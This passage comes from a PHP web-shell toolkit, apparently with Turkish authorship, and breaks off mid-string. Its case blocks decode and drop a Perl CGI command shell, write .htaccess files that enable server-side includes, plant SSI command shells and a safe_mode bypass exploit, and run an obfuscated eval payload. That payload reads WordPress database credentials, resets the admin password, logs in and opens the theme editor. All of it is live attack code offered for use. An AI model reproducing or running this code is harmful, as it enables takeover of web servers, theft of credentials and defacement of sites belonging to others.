  6953. dCIgdmFsdWU9IlJ1biI+DQo8L2Zvcm0+DQo8cHJlPic7DQoNCmlmKGRlZmluZWQgJEZPUk17J2Nt
  6954.  
  6955. ZCd9KSB7DQogIHByaW50ICJSZXN1bHRzIG9mICckY21kJyBleGVjdXRpb246XG5cbiI7DQogIHBy
  6956.  
  6957. aW50ICItIng4MDsNCiAgcHJpbnQgIlxuIjsNCg0KICBvcGVuKENNRCwgIigkY21kKSAyPiYxIHwi
  6958.  
  6959. KSB8fCBwcmludCAiQ291bGQgbm90IGV4ZWN1dGUgY29tbWFuZCI7DQoNCiAgd2hpbGUoPENNRD4p
  6960.  
  6961. IHsNCiAgICBwcmludDsNCiAgfQ0KDQogIGNsb3NlKENNRCk7DQogIHByaW50ICItIng4MDsNCiAg
  6962.  
  6963. cHJpbnQgIlxuIjsNCn0NCg0KcHJpbnQgIjwvcHJlPiI7DQoNCnN1YiBwYXJzZV9wYXJhbWV0ZXJz
  6964.  
  6965. ICgkKSB7DQogIG15ICVyZXQ7DQoNCiAgbXkgJGlucHV0ID0gc2hpZnQ7DQoNCiAgZm9yZWFjaCBt
  6966.  
  6967. eSAkcGFpciAoc3BsaXQoJyYnLCAkaW5wdXQpKSB7DQogICAgbXkgKCR2YXIsICR2YWx1ZSkgPSBz
  6968.  
  6969. cGxpdCgnPScsICRwYWlyLCAyKTsNCiAgICANCiAgICBpZigkdmFyKSB7DQogICAgICAkdmFsdWUg
  6970.  
  6971. PX4gcy9cKy8gL2cgOw0KICAgICAgJHZhbHVlID1+IHMvJSguLikvcGFjaygnYycsaGV4KCQxKSkv
  6972.  
  6973. ZWc7DQoNCiAgICAgICRyZXR7JHZhcn0gPSAkdmFsdWU7DQogICAgfQ0KICB9DQoNCiAgcmV0dXJu
  6974.  
  6975. ICVyZXQ7DQp9';
  6976.  
  6977.  
  6978.  
  6979. $file = fopen("cgi.pr" ,"w+");
  6980.  
  6981. $write = fwrite ($file ,base64_decode($cgico));
  6982.  
  6983. fclose($file);
  6984.  
  6985. chmod("cgi.pr",0755);
  6986.  
  6987. echo "<iframe src=cgirun/cgi.pr width=100% height=100% frameborder=0></iframe> ";
  6988.  
  6989. break;
  6990.  
  6991. case "PHP_29":
  6992.  
  6993. mkdir('ssim', 0755);
  6994.  
  6995. chdir('ssim');
  6996.  
  6997. $kokdosya = ".htaccess";
  6998.  
  6999. $dosya_adi = "$kokdosya";
  7000.  
  7001. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  7002.  
  7003. $metin = "AddType text/html .shtml
  7004.  
  7005. AddHandler server-parsed .shtml
  7006.  
  7007. AddOutputFilter INCLUDES .shtml
  7008.  
  7009. Options +Includes";
  7010.  
  7011. fwrite ( $dosya , $metin ) ;
  7012.  
  7013. fclose ($dosya);
  7014.  
  7015. $ssiizo2023 = 'PCEtLSNpZiBleHByPSIkSFRUUF9IQ01EIi0tPjwhLS0jZXhlYyBjbWQ9ImNkICRIVFRQX0hQV0Q7
  7016.  
  7017. ICRIVFRQX0hDTUQgMj4mMSItLT48IS0tI2Vsc2UtLT48aHRtbD48aGVhZD48dGl0bGU+UC5TLlMu
  7018.  
  7019. PC90aXRsZT48c3R5bGUgdHlwZT0idGV4dC9jc3MiPmh0bWwsYm9keSwjanNvbix4bXAsZm9ybSx0
  7020.  
  7021. YWJsZSx0YWJsZSB0ZCxpbnB1dHttYXJnaW46MDtwYWRkaW5nOjA7fWh0bWx7YmFja2dyb3VuZDoj
  7022.  
  7023. MDAwMDAwO30uZXJye3BhZGRpbmc6OHB4O3RleHQtYWxpZ246Y2VudGVyO2JvcmRlcjoxcHggc29s
  7024.  
  7025. aWQgcmVkO2JhY2tncm91bmQ6I2ZmZmZmZjt9I2pzb2Zme21hcmdpbjo1cHggOHB4O30janNvbntk
  7026.  
  7027. aXNwbGF5Om5vbmU7IHBhZGRpbmc6NXB4IDhweDt9eG1wLHRhYmxlLGlucHV0e2ZvbnQ6bm9ybWFs
  7028.  
  7029. IDlwdCAiQ291cmllciBOZXciO2NvbG9yOiNmMGYwZjA7Ym9yZGVyOm5vbmU7fXRhYmxle3dpZHRo
  7030.  
  7031. OjEwMCU7Ym9yZGVyLWNvbGxhcHNlOmNvbGxhcHNlO30udGRuYnJ7d2hpdGUtc3BhY2U6cHJlO31p
  7032.  
  7033. bnB1dHtvdXRsaW5lOm5vbmU7IGJhY2tncm91bmQ6IzAwMDAwMDt9aW5wdXQ6Oi1tb3otZm9jdXMt
  7034.  
  7035. aW5uZXJ7Ym9yZGVyOm5vbmU7fTwvc3R5bGU+PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQi
  7036.  
  7037. PnZhciByZXosY21kLGhpc3QsdXNyLHNydixwd2Qsc3VzcixzcHdkO2Z1bmN0aW9uIHRyaW0oc3Ry
  7038.  
  7039. KXtyZXR1cm4gc3RyLnJlcGxhY2UoLyheXHMrKXwoXHMrJCkvZywgIiIpO31mdW5jdGlvbiBpbml0
  7040.  
  7041. KCl7cmV6PWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdyZXonKTtjbWQ9ZG9jdW1lbnQuZ2V0RWxl
  7042.  
  7043. bWVudEJ5SWQoJ2NtZCcpO2hpc3Q9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2hpc3QnKTtzdXNy
  7044.  
  7045. PWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzdXNyJyk7c3B3ZD1kb2N1bWVudC5nZXRFbGVtZW50
  7046.  
  7047. QnlJZCgnc3B3ZCcpO3Vzcj10cmltKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCd1c3InKS52YWx1
  7048.  
  7049. ZSk7c3J2PWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzc3J2JykuaW5uZXJIVE1MO3B3ZD10cmlt
  7050.  
  7051. KGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdwd2QnKS52YWx1ZSk7ZG9jdW1lbnQuZ2V0RWxlbWVu
  7052.  
  7053. dEJ5SWQoJ2pzb2ZmJykuc3R5bGUuZGlzcGxheT0nbm9uZSc7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5
  7054.  
  7055. SWQoJ2pzb24nKS5zdHlsZS5kaXNwbGF5PSdibG9jayc7aWYoc3Vzci5pbm5lclRleHQpe3N1c3Iu
  7056.  
  7057. aW5uZXJUZXh0PXVzcjtzcHdkLmlubmVyVGV4dD1wd2Q7fWVsc2V7c3Vzci50ZXh0Q29udGVudD11
  7058.  
  7059. c3I7c3B3ZC50ZXh0Q29udGVudD1wd2Q7fWNtZC5mb2N1cygpOzwhLS0jaWYgZXhwcj0iIi0tPgpk
  7060.  
  7061. b2N1bWVudC5nZXRFbGVtZW50QnlJZCgnc3Npb24nKS5zdHlsZS5kaXNwbGF5PSdub25lJzs8IS0t
  7062.  
  7063. I2VuZGlmLS0+Cn1mdW5jdGlvbiBlbmRDbWQoKXtpZihzdXNyLmlubmVyVGV4dCljbWQudmFsdWU9
  7064.  
  7065. Jyc7ZWxzZXtjbWQuYmx1cigpO2NtZC52YWx1ZT0nJztjbWQuZm9jdXMoKTt9ZG9jdW1lbnQuYm9k
  7066.  
  7067. eS5zY3JvbGxUb3A9ZG9jdW1lbnQuYm9keS5zY3JvbGxIZWlnaHQ7fWZ1bmN0aW9uIHNlbmRDbWQo
  7068.  
  7069. KXt2YXIgY21kVmFsdWU9Y21kLnZhbHVlO2lmKGhpc3Qub3B0aW9ucyl7dmFyIGlzVW5pcXVlPXRy
  7070.  
  7071. dWUsb3B0Q291bnQ9aGlzdC5vcHRpb25zLmxlbmd0aDtmb3IodmFyIGk9MDtpPG9wdENvdW50O2kr
  7072.  
  7073. KylpZihoaXN0Lm9wdGlvbnNbaV0udmFsdWU9PWNtZFZhbHVlKXtpc1VuaXF1ZT1mYWxzZTticmVh
  7074.  
  7075. azt9aWYoaXNVbmlxdWUpaGlzdC5hcHBlbmRDaGlsZChuZXcgT3B0aW9uKGNtZFZhbHVlLGNtZFZh
  7076.  
  7077. bHVlKSk7fWlmKGNtZFZhbHVlPT0nY2xlYXInKXtyZXouaW5uZXJIVE1MPScnO2VuZENtZCgpO31l
  7078.  
  7079. bHNlIGlmKGNtZFZhbHVlPT0nZXhpdCcpd2luZG93LmNsb3NlKCk7ZWxzZSBpZihjbWRWYWx1ZSE9
  7080.  
  7081. Jycpe3ZhciBhamF4PW5ldyBYTUxIdHRwUmVxdWVzdCgpO2FqYXguY21kPWNtZFZhbHVlO2lmKGNt
  7082.  
  7083. ZFZhbHVlLnN1YnN0cigwLDMpPT0nY2QgJyljbWRWYWx1ZSs9JyAyPiYxOyBwd2QnO2FqYXgub3Bl
  7084.  
  7085. bignR0VUJyxkb2N1bWVudC5VUkwsdHJ1ZSk7YWpheC5vbnJlYWR5c3RhdGVjaGFuZ2U9b25TdGF0
  7086.  
  7087. dXNDaGFuZ2U7YWpheC5zZXRSZXF1ZXN0SGVhZGVyKCdIVVNSJyx1c3IpO2FqYXguc2V0UmVxdWVz
  7088.  
  7089. dEhlYWRlcignSFBXRCcscHdkKTthamF4LnNldFJlcXVlc3RIZWFkZXIoJ0hDTUQnLGNtZFZhbHVl
  7090.  
  7091. KTthamF4LnNlbmQobnVsbCk7fX1mdW5jdGlvbiBvblN0YXR1c0NoYW5nZSgpe2lmKHRoaXMucmVh
  7092.  
  7093. ZHlTdGF0ZT09NCl7aWYodGhpcy5zdGF0dXM9PTIwMCl7dmFyIHJlcz11c3IrJ0AnK3NydisnOicr
  7094.  
  7095. cHdkKyckICcrdGhpcy5jbWQrJ1xuJztpZih0aGlzLmNtZC5zdWJzdHIoMCwzKT09J2NkICcpe2lm
  7096.  
  7097. KHRoaXMucmVzcG9uc2VUZXh0LmluZGV4T2YoImNhbid0IGNkIik9PS0xKXtwd2Q9dHJpbSh0aGlz
  7098.  
  7099. LnJlc3BvbnNlVGV4dCk7aWYocHdkLmlubmVyVGV4dClzcHdkLmlubmVyVGV4dD1wd2Q7ZWxzZSBz
  7100.  
  7101. cHdkLnRleHRDb250ZW50PXB3ZDtyZXMrPSdcbic7fWVsc2UgcmVzKz0nY2FuXCd0IGNkICcrdGhp
  7102.  
  7103. cy5jbWQuc3Vic3RyKDMpKydcblxuJzt9ZWxzZSByZXMrPXRoaXMucmVzcG9uc2VUZXh0O2lmKHJl
  7104.  
  7105. ei5pbm5lclRleHQpcmV6LmlubmVyVGV4dCs9cmVzO2Vsc2UgcmV6LnRleHRDb250ZW50Kz1yZXM7
  7106.  
  7107. ZW5kQ21kKCk7fWVsc2UgYWxlcnQoIkVSUk9SOlxuU3RhdHVzOiAiK3RoaXMuc3RhdHVzKyIgKCIr
  7108.  
  7109. dGhpcy5zdGF0dXNUZXh0KyIpXG5Db21tYW5kOiAiK3RoaXMuY21kKTt9fTwvc2NyaXB0PjwvaGVh
  7110.  
  7111. ZD48Ym9keSBvbmxvYWQ9ImluaXQoKSI+PGRpdiBpZD0ianNvZmYiIGNsYXNzPSJlcnIiPkNhbid0
  7112.  
  7113. IHdvcmsgd2l0aG91dCBqYXZhc2NyaXB0LiBTb3JyeS48L2Rpdj48ZGl2IGlkPSJqc29uIj48IS0t
  7114.  
  7115. I2lmIGV4cHI9IiItLT48ZGl2IGNsYXNzPSJlcnIiPlNTSSBub3Qgd29yay4gU29ycnkuPC9kaXY+
  7116.  
  7117. PCEtLSNlbmRpZi0tPjxkaXYgaWQ9InNzaW9uIj48eG1wIGlkPSJyZXoiPjwveG1wPjxmb3JtIGFj
  7118.  
  7119. dGlvbj0iIiBtZXRob2Q9InBvc3QiIG9uc3VibWl0PSJzZW5kQ21kKCk7IHJldHVybiBmYWxzZSI+
  7120.  
  7121. PHRhYmxlIGJvcmRlcj0iMCI+PHRyPjx0ZCB3aWR0aD0iMTBweCIgY2xhc3M9InRkbmJyIj48c3Bh
  7122.  
  7123. biBpZD0ic3VzciI+PC9zcGFuPkA8c3BhbiBpZD0ic3NydiI+PCEtLSNlY2hvIHZhcj0iU0VSVkVS
  7124.  
  7125. X05BTUUiLS0+PC9zcGFuPjo8c3BhbiBpZD0ic3B3ZCI+PC9zcGFuPiQgPC90ZD48dGQ+PGlucHV0
  7126.  
  7127. IHR5cGU9InRleHQiIGlkPSJjbWQiIHN0eWxlPSJ3aWR0aDoxMDAlIiBsaXN0PSJoaXN0Ii8+PC90
  7128.  
  7129. ZD48dGQgd2lkdGg9IjEwcHgiPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSImZ3Q7Jmd0OyIv
  7130.  
  7131. PjwvdGQ+PC90cj48L3RhYmxlPjxkYXRhbGlzdCBpZD0iaGlzdCI+PC9kYXRhbGlzdD48aW5wdXQg
  7132.  
  7133. dHlwZT0iaGlkZGVuIiBpZD0idXNyIiB2YWx1ZT0iPCEtLSNleGVjIGNtZD0id2hvYW1pIi0tPiIv
  7134.  
  7135. PjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJwd2QiIHZhbHVlPSI8IS0tI2V4ZWMgY21kPSJwd2Qi
  7136.  
  7137. LS0+Ii8+PC9mb3JtPjwvZGl2PjwvZGl2PjwvYm9keT48L2h0bWw+PCEtLSNlbmRpZi0tPgo=';
  7138.  
  7139.  
  7140.  
  7141. $file = fopen("pss_v.1.0_min.shtml" ,"w+");
  7142.  
  7143. $write = fwrite ($file ,base64_decode($ssiizo2023));
  7144.  
  7145. fclose($file);
  7146.  
  7147.  
  7148.  
  7149. echo "<iframe src=ssim/pss_v.1.0_min.shtml width=100% height=100% frameborder=0></iframe> ";
  7150.  
  7151. break;
  7152.  
  7153. case "PHP_30":
  7154.  
  7155. mkdir('Ph33r', 0755);
  7156.  
  7157. chdir('Ph33r');
  7158.  
  7159. $kokdosya = ".htaccess";
  7160.  
  7161. $dosya_adi = "$kokdosya";
  7162.  
  7163. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  7164.  
  7165. $metin = "AddHandler server-parsed .html .Ph33r";
  7166.  
  7167. fwrite ( $dosya , $metin ) ;
  7168.  
  7169. fclose ($dosya);
  7170.  
  7171. $sabolamer = 'dXNlckBOaW5qYS1TZWN1cml0eTp+CjwhLS0jZXhlYyBjbWQ9IiRIVFRQX0FDQ0VQVCIgLS0+';
  7172.  
  7173. $file = fopen("Ph33r.Ph33r" ,"w+");
  7174.  
  7175. $write = fwrite ($file ,base64_decode($sabolamer));
  7176.  
  7177. fclose($file);
  7178.  
  7179. $izobasbakan = 'PD9waHAKCiMgVVJMIFNTSQokdXJsUGgzID0gJ1BoMzNyLlBoMzNyJzsKCiAgICBmdW5jdGlvbiBz
  7180.  
  7181. ZW5kKCR1cmxQaDMsJGNtZCkKICAgIHsKICAgICAgICBpZigkY3VybCA9IGN1cmxfaW5pdCgpKQog
  7182.  
  7183. ICAgICAgIHsjIGJ5cGFzcyAyMDExCgkJICMgc2FmZV9tb2QgJiBQSFBTdUhvc2luICYgZGlzYWJs
  7184.  
  7185. ZV9mdW5jdGlvbnMKCQkgIyBCeSBQaDMzcgogICAgICAgICAgICBjdXJsX3NldG9wdCgkY3VybCxD
  7186.  
  7187. VVJMT1BUX1VSTCwgJHVybFBoMyk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsLENVUkxP
  7188.  
  7189. UFRfUkVUVVJOVFJBTlNGRVIsdHJ1ZSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsLENV
  7190.  
  7191. UkxPUFRfQ09OTkVDVFRJTUVPVVQsMzApOwoKICAgICAgICAgICAgJGhlYWRlcnMgPSBhcnJheSgi
  7192.  
  7193. QWNjZXB0OiAiLiRjbWQpOwoKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9QVF9I
  7194.  
  7195. VFRQSEVBREVSLCRoZWFkZXJzKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9Q
  7196.  
  7197. VF9VUkwsJHVybFBoMyk7CiAgICAgICAgICAgIHJldHVybiBjdXJsX2V4ZWMoJGN1cmwpOwoKICAg
  7198.  
  7199. ICAgICB9CiAgICAgICAgY3VybF9jbG9zZSgkY3VybCk7CiAgICB9CiAgICBwcmludCAnPGhlYWQ+
  7200.  
  7201. Cjx0aXRsZT4gUGgzM3IgLSBieXBhc3MgMjAxMSBTU2kgPC90aXRsZT4KPHN0eWxlIHR5cGU9InRl
  7202.  
  7203. eHQvY3NzIj4KLmF1dG8tc3R5bGUxIHsKCXRleHQtYWxpZ246IGNlbnRlcjsKfQouYXV0by1zdHls
  7204.  
  7205. ZTIgewoJdGV4dC1hbGlnbjogY2VudGVyOwoJZm9udC13ZWlnaHQ6IGJvbGQ7Cglmb250LWZhbWls
  7206.  
  7207. eTogQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZjsKfQouYXV0by1zdHlsZTMgewoJdGV4dC1h
  7208.  
  7209. bGlnbjogY2VudGVyOwoJY29sb3I6ICNGRjk5MzM7Cn0KLmF1dG8tc3R5bGU0IHsKCWZvbnQtc2l6
  7210.  
  7211. ZTogeHgtc21hbGw7Cglmb250LXdlaWdodDogYm9sZDsKfQphIHsKCWNvbG9yOiAjQzBDMEMwOwp9
  7212.  
  7213. CmE6dmlzaXRlZCB7Cgljb2xvcjogI0MwQzBDMDsKfQphOmFjdGl2ZSB7Cgljb2xvcjogI0MwQzBD
  7214.  
  7215. MDsKfQphOmhvdmVyIHsKCWNvbG9yOiAjQzBDMEMwOwp9Cjwvc3R5bGU+CjwvaGVhZD4nOwogICAg
  7216.  
  7217. cHJpbnQnPGJvZHkgc3R5bGU9ImNvbG9yOiAjRkY5OTMzOyBiYWNrZ3JvdW5kLWNvbG9yOiAjNjY2
  7218.  
  7219. NjY2OyAiPgoKPGRpdiBjbGFzcz0iYXV0by1zdHlsZTMiPgonOwogICAgcHJpbnQgJwk8c3BhbiBj
  7220.  
  7221. bGFzcz0iYXV0by1zdHlsZTIiPlNTSSBleHBsb2l0IC0gJy4kdXJsUGgzLic8L3NwYW4+IDxiciBj
  7222.  
  7223. bGFzcz0iYXV0by1zdHlsZTQiIC8+PGJyIC8+JzsKCXByaW50ICc8L2Rpdj4nOwogICAgcHJpbnQg
  7224.  
  7225. JzwvZGl2Pgo8Zm9ybSBhY3Rpb249IiMiIG1ldGhvZD0icG9zdCI+Cgk8ZGl2IGNsYXNzPSJhdXRv
  7226.  
  7227. LXN0eWxlMSI+JzsKCiAgICBwcmludCAkX1BPU1RbJ2NtZCddLic6IDxiciAvPic7CiAgICBwcmlu
  7228.  
  7229. dCAnPHRleHRhcmVhIHdyYXA9Im9mZiIgc3R5bGU9IndpZHRoOiA2OTdweDsgaGVpZ2h0OiAyOTNw
  7230.  
  7231. eCIgbmFtZT0iUGgzM3IiPicuIHNlbmQoJHVybFBoMywkX1BPU1RbJ2NtZCddKSAuJzwvdGV4dGFy
  7232.  
  7233. ZWE+PGJyIC8+JzsKCiAgICBwcmludCAnPGlucHV0IG5hbWU9ImNtZCIgdHlwZT0idGV4dCIgdmFs
  7234.  
  7235. dWU9InVuYW1lIC1hIj48YnIgLz4nOwoKICAgIHByaW50ICc8aW5wdXQgdHlwZT0ic3VibWl0IiB2
  7236.  
  7237. YWx1ZT0iUGgzM3IiPjxiciAvPic7CiAgICBwcmludCAnPC9kaXY+IDwvZm9ybT4KIDxhIGhyZWY9
  7238.  
  7239. Imh0dHA6Ly9wZW50ZXN0LmVua24ubmV0L2Jsb2cucGhwIj4gCjxwIGNsYXNzPSJhdXRvLXN0eWxl
  7240.  
  7241. MSI+TmluamEtU2VjdXJpdHkgdGVhbTxwPjwvYT4KPHAgY2xhc3M9ImF1dG8tc3R5bGUxIj4KPGZv
  7242.  
  7243. bnQgY29sb3I9IiNGRjAwMDAiPjxiPkFudGktdHJ1c3QgLSBQaDMzciAtPGZvbnQgY29sb3I9IiNG
  7244.  
  7245. RjAwMDAiPkJsYWNrIApIYXQgLSBtYXowMDI8L2ZvbnQ+JzsKcHJpbnQgJzxwIGNsYXNzPSJhdXRv
  7246.  
  7247. LXN0eWxlMSI+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj48Yj4gd2VsY29tZS1iYWNrIDogc2VjLXIx
  7248.  
  7249. ei5jb20gPC9mb250PjwvYT4gPC9iPic7Cgo/Pg==';
  7250.  
  7251.  
  7252.  
  7253. $file = fopen("Ph33r.php" ,"w+");
  7254.  
  7255. $write = fwrite ($file ,base64_decode($izobasbakan));
  7256.  
  7257. fclose($file);
  7258.  
  7259.  
  7260.  
  7261. echo "<iframe src=Ph33r/Ph33r.php width=100% height=100% frameborder=0></iframe> ";
  7262.  
  7263. break;
  7264. case "PHP_77":
  7265. eval(base64_decode("aW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAiMCIpOw0Kc2V0X3RpbWVfbGltaXQoMCk7DQpAc2Vzc2lvbl9zdGFydCgpOw0KJGJhc2VfcGF0aCA9IGRpcm5hbWUoX19GSUxFX18pLicvJzsNCg0KDQpmdW5jdGlvbiBlbnRyZTJ2MigkdGV4dCwkbWFycXVldXJEZWJ1dExpZW4sJG1hcnF1ZXVyRmluTGllbiwkaT0xKXsNCiAgICAkYXIwPWV4cGxvZGUoJG1hcnF1ZXVyRGVidXRMaWVuLCAkdGV4dCk7DQogICAgJGFyMT1leHBsb2RlKCRtYXJxdWV1ckZpbkxpZW4sICRhcjBbJGldKTsNCiAgICByZXR1cm4gdHJpbSgkYXIxWzBdKTsgfQ0KDQpmdW5jdGlvbiByYW5kb210KCkgew0KICAgICRjaGFycyA9ICJhYmNkZWZnaGlqa21ub3BxcnN0dXZ3eHl6MDIzNDU2Nzg5IjsNCiAgICBzcmFuZCgoZG91YmxlKW1pY3JvdGltZSgpKjEwMDAwMDApOw0KICAgICRpID0gMDsNCiAgICAkcGFzcyA9ICcnOw0KICAgIHdoaWxlICgkaSA8PSA3KSB7DQogICAgICAgICRudW0gPSByYW5kKCkgJSAzMzsNCiAgICAgICAgJHRtcCA9IHN1YnN0cigkY2hhcnMsICRudW0sIDEpOw0KICAgICAgICAkcGFzcyA9ICRwYXNzIC4gJHRtcDsNCiAgICAgICAgJGkrKzsNCiAgICB9DQogICAgcmV0dXJuICRwYXNzOw0KfQ0KDQpmdW5jdGlvbiBpbmRleF9jaGFuZ2VyX3dwKCRjb25mLCAkY29udGVudCkgew0KICAgICRvdXRwdXQgPSAnJzsNCiAgICAkZG9sID0gJyQnOw0KICAgICR1c2VybmFtZSA9IGVudHJlMnYyKCRjb25mLCJkZWZpbmUoJ0RCX1VTRVInLCAnIiwiJyk7Iik7DQogICAgJHBhc3N3b3JkID0gZW50cmUydjIoJGNvbmYsImRlZmluZSgnREJfUEFTU1dPUkQnLCAnIiwiJyk7Iik7DQogICAgJGRibmFtZSA9IGVudHJlMnYyKCRjb25mLCJkZWZpbmUoJ0RCX05BTUUnLCAnIiwiJyk7Iik7DQogICAgJHByZWZpeCA9IGVudHJlMnYyKCRjb25mLCRkb2wuInRhYmxlX3ByZWZpeCAgPSAnIiwiJyIpOw0KICAgICRob3N0ID0gZW50cmUydjIoJGNvbmYsImRlZmluZSgnREJfSE9TVCcsICciLCInKTsiKTsNCg0KICAgICRsaW5rPW15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXJuYW1lLCRwYXNzd29yZCk7DQogICAgaWYoJGxpbmspIHsNCiAgICAgICAgbXlzcWxfc2VsZWN0X2RiKCRkYm5hbWUsJGxpbmspIDsNCiAgICAgICAgJGRvbCA9ICckJzsNCiAgICAgICAgJHJlcTEgPSBteXNxbF9xdWVyeSgiVVBEQVRFIGAiLiRwcmVmaXguInVzZXJzYCBTRVQgYHVzZXJfbG9naW5gID0gJ2FkbWluJyxgdXNlcl9wYXNzYCA9ICcwYTU2Zjg2YTRlYTc4OWY1NTVjMmJkZmFmYjYxZmQ0YScgV0hFUkUgYElEYCA9IDEiKTsNCiAgICB9IGVsc2Ugew0KICAgICAgICAkb3V0cHV0Lj0gIlstXSBEQiBFcnJvcjxiciAvPiI7DQogICAgfQ0KICAgIGlmKCRyZXExKSB7DQoNCiAgICAgICAgJHJlcSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBmcm9tICBgIi4kcHJlZml4LiJvcHRpb25zYCBXSEVSRSBvcHRpb25fbmFtZT0naG9tZSciKTsNCiAgICAgICAgJGRhdGEgPSBteXNxbF9mZXRjaF9hcnJheSgkcmVxKTsNCiAgICAgICAgJHNpdGVfdXJsPSRkYXRhWyJvcHRpb25fdmFsdWUiXTsgDQoNCiAgICAgICAgJHJlcSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBmcm9tICBgIi4kcHJlZml4LiJvcHRpb25zYCBXSEVSRSBvcHRpb25fbmFtZT0ndGVtcGxhdGUnIik7DQogICAgICAgICRkYXRhID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlcSk7DQogICAgICAgICR0ZW1wbGF0ZSA9ICRkYXRhWyJvcHRpb25fdmFsdWUiXTsNCg0KICAgICAgICAkcmVxID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIGZyb20gIGAiLiRwcmVmaXguIm9wdGlvbnNgIFdIRVJFIG9wdGlvbl9uYW1lPSdjdXJyZW50X3RoZW1lJyIpOw0KICAgICAgICAkZGF0YSA9IG15c3FsX2ZldGNoX2FycmF5KCRyZXEpOw0KICAgICAgICAkY3VycmVudF90aGVtZSA9ICRkYXRhWyJvcHRpb25fdmFsdWUiXTsNCg0KICAgICAgICAkdXNlcmFnZW50PSJNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjBiOyBXaW5kb3dzIE5UIDUuMTsgLk5FVCBDTFIgMS4xLjQzMjI7IEFsZXhhIFRvb2xiYXI7IC5ORVQgQ0xSIDIuMC41MDcyNykiOw0KICAgICAgICAkdXJsMj0kc2l0ZV91cmwuIi93cC1sb2dpbi5waHAiOw0KDQogICAgICAgICRjaCA9IGN1cmxfaW5pdCgpOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsMik7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NULCAxKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsImxvZz1hZG1pbiZwd2Q9c2x5bW4xMjMmcmVtZW1iZXJtZT1mb3JldmVyJndwLXN1Ym1pdD1Mb2cgSW4mdGVzdGNvb2tpZT0xIik7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAkdXNlcmFnZW50KTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgIkNPT0tJRS50eHQiKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPT0tJRUZJTEUsICJDT09LSUUudHh0Iik7DQogICAgICAgICRidWZmZXIgPSBjdXJsX2V4ZWMoJGNoKTsNCg0KICAgICAgICAkcG9zID0gc3RycG9zKCRidWZmZXIsImFjdGlvbj1sb2dvdXQiKTsNCiAgICAgICAgaWYoJHBvcyA9PT0gZmFsc2UpIHsNCiAgICAgICAgICAgICRvdXRwdXQuPSAiWy1dIFN1Y2Nlc3NmdWwgTG9naW48YnIgLz4iOw0KICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgICAgJG91dHB1dC49ICJbK10gU3VjY2Vzc2Z1bCBMb2dpbjxiciAvPiI7DQogICAgICAgIH0NCg0KICAgICAgICAkdXJsMj0kc2l0ZV91cmwuIi93cC1hZG1pbi90aGVtZS1lZGl0b3IucGhwP2ZpbGU9L3RoZW1lcy8iLiR0ZW1wbGF0ZS4nL2luZGV4LnBocCZ0aGVtZT0nLnVybGVuY29kZSgkY3VycmVudF90aGVtZSkuJyZkaXI9dGhlbWUnOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsMik7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMCk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICR1c2VyYWdlbnQpOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09PS0lFSkFSLCAiQ09PS0lFLnR4dCIpOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09PS0lFRklMRSwgIkNPT0tJRS50eHQiKTsNCiAgICAgICAgJGJ1ZmZlcjAgPSBjdXJsX2V4ZWMoJGNoKTsNCg0KICAgICAgICAkX3dwbm9uY2UgPSBlbnRyZTJ2MigkYnVmZmVyMCwnPGlucHV0